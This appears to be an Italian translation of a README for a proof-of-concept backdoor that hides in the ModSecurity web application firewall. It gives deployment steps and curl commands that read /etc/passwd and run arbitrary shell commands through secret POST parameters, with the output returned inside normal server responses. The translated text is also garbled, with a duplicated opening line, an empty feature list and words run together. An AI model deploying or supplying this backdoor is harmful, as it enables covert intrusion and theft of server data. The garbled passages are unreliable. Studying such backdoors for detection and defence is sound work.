
Questa è una proof-of-concept di software dannoso in esecuzione all'interno del WAF ModSecurity.
Questa è una prova di concetto di software dannoso in esecuzione all'interno del WAF ModSecurity.
Il software ha due funzioni principali:
Inoltre, include queste funzioni:
SecStreamOutBodyInspection e SecContentInjection
devono essere impostate su OnOttenere i file backdoor.conf e backdoor.lua e caricare il primo nel
server web.
La configurazione può essere effettuata nella prima regola del file backdoor.conf.
Questa impostazione può essere utilizzata per impostare il nome dell'argomento POST usato per recuperare
il contenuto dei file. Impostarlo su qualcosa di casuale come koomem6Shmog.
Questa impostazione può essere utilizzata per impostare il nome dell'argomento POST usato per eseguire
i comandi. Impostarlo su qualcosa di casuale come tys4Olhuibves.
I comandi possono essere eseguiti su qualsiasi indirizzo (dominio) del server di destinazione che si trova dietro il WAF ModSecurity. L'output dei comandi viene aggiunto alla risposta standard del server.
Recupero del contenuto di un file:
curl -X POST -d "koomem6Shmog=/etc/passwd" "http://example.com/"
Esecuzione di un comando e ottenimento dell'output:
curl -X POST -d "tys4Olhuibves=/bin/ps aux" "http://example.com/"
Copyright (c) 2022 Jozef Sudolsky. Tutti i diritti riservati.
"THE BEER-WARE LICENSE" (Revision 42): [email protected] ha scritto questo file. Finché mantieni questo avviso puoi fare quello che vuoi con questa roba. Se ci incontriamo un giorno e pensi che questa roba valga qualcosa, puoi offrirmi una birra in cambio. Jozef Sudolsky